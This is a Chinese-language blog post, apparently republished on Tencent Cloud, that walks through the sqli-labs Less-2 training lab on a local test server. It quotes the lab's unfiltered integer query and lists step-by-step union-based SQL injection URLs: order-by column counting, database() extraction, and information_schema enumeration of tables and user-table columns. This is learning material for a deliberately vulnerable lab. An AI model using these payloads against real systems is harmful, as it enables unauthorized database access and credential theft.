前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >sql-lib每日一记_Less2(day2)

sql-lib每日一记_Less2(day2)

作者头像
用户6343818
发布2019-12-16 11:48:08
发布2019-12-16 11:48:08
5060
举报
文章被收录于专栏:安全小圈安全小圈

SQL-Lib_Less2

  • 查看源代码

本地环境试验访问地址:http://192.168.72.179/sqli-labs/Less-1/?id=1

  • 查询语句
  • $sql=”SELECT * FROM users WHERE id=$id LIMIT 0,1”;
  • 可以看到这里并没有对id进行过滤,并且查询的是整数并以双引号闭合
  • 所以可以得知,整数注入可以直接和上面一篇一样注入,但无需闭合

  • 爆破字段
    • http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 1 http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 2 http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 3 http://192.168.72.179/sqli-labs/Less-2/?id=1 order by 4(到这里报错说明4是最大字段数)

  • 联合查询
    • http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,3
  • 发现了上面的三个字段的输出位置

  • 爆破数据库
    • http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,database()
    • 得到了当前数据库为security

  • 爆破security数据库表
    • http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=”security”

爆破users表中的字段

  • http://192.168.72.179/sqli-labs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=”security” and table_name=”users” 得到了id,username,password 三个字段

提取字段中的username和password内容

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-12-03,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 安全小圈 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • SQL-Lib_Less2
    • 爆破users表中的字段
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档